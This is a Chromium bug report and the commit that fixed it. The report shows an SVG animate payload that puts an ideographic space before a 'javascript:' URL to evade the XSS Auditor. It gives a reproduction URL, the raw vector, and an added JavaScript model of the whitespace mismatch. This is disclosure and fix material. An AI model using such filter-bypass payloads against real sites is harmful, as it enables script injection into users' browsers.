UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Steps to reproduce the problem:
1. Go to `https://vulnerabledoma.in/char_test?body=%3Csvg%3E%3Canimate%20href=%23x%20attributeName=href%20values=%26%23x3000%3Bjavascript:alert(1)%20/%3E%3Ca%20id=x%3E%3Crect%20width=100%20height=100%20/%3E%3C/a%3E`
2. Click the black square. JavaScript is run.
The vector is:
```
<svg><animate href=#x attributeName=href values=&#x3000;javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
```
What is the expected behavior?
It should be blocked by XSS Auditor
What went wrong?
It is not blocked by XSS Auditor
Did this work before? N/A
Chrome version: 57.0.2987.133 Channel: stable
OS Version: 10.0
Flash Version:
The following revision refers to this bug:
https://chromium.googlesource.com/chromium/src.git/+/cd2205139c375696291bffcf86d27ef4e83d7994
commit cd2205139c375696291bffcf86d27ef4e83d7994
Author: `fs <fs@opera.com>`
Date: Tue Apr 11 17:08:49 2017
Strip only ASCII spaces from SMIL 'values' attributes
This is more consistent with other microsyntaxes used for attribute
parsing, while also making it consistent with the XSSAuditor.
BUG=709365, 710460
Review-Url: https://codereview.chromium.org/2807193003
Cr-Commit-Position: refs/heads/master@{#463662}
[add] https://crrev.com/cd2205139c375696291bffcf86d27ef4e83d7994/third_party/WebKit/LayoutTests/svg/animations/animate-values-whitespace.html
[modify] https://crrev.com/cd2205139c375696291bffcf86d27ef4e83d7994/third_party/WebKit/Source/core/svg/SVGAnimationElement.cpp
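An added illustration of the mismatch this fix closes (example code, not from the bug report or the Chromium commit): the SMIL `values` parser is modelled as having trimmed all Unicode whitespace, so the U+3000 in the vector disappeared and `javascript:` reached the consumer, while the XSS Auditor only strips ASCII space and so never saw a `javascript:` URL. The function names and the parsing model are assumptions, not Blink's API.

```javascript
// Added example, not Chromium code. Models two ways of trimming an SVG
// animation 'values' list and shows why they must agree.

const IDEOGRAPHIC_SPACE = "\u3000"; // the character in the report's vector

// Assumed model of the old behaviour: trim every Unicode whitespace
// character (JavaScript's \s includes U+3000).
function trimUnicodeWhitespace(s) {
  return s.replace(/^\s+|\s+$/g, "");
}

// Fixed behaviour per the commit title: strip only ASCII space (U+0020),
// which is also what the XSS Auditor strips before matching.
function trimAsciiSpace(s) {
  return s.replace(/^ +| +$/g, "");
}

// Assumed model of 'values' parsing: semicolon-separated list, each item
// trimmed with the supplied trimmer.
function parseValues(attr, trim) {
  return attr.split(";").map(trim);
}

// Would the consumer receive an item that starts with "javascript:"?
function yieldsJavascriptUrl(attr, trim) {
  return parseValues(attr, trim).some((v) => /^javascript:/i.test(v));
}

// Defender-side check: the bypass condition is exactly the case where the
// two normalizations disagree about whether a javascript: URL is present.
function normalizationMismatch(attr) {
  return yieldsJavascriptUrl(attr, trimUnicodeWhitespace) !==
         yieldsJavascriptUrl(attr, trimAsciiSpace);
}

// Constructed sample matching the report's vector: U+3000 then the URL.
const SAMPLE = IDEOGRAPHIC_SPACE + "javascript:alert(1)";

console.log("old parser sees javascript: URL:",
            yieldsJavascriptUrl(SAMPLE, trimUnicodeWhitespace)); // true
console.log("fixed parser sees javascript: URL:",
            yieldsJavascriptUrl(SAMPLE, trimAsciiSpace));        // false
console.log("normalization mismatch (bypass):", normalizationMismatch(SAMPLE));
```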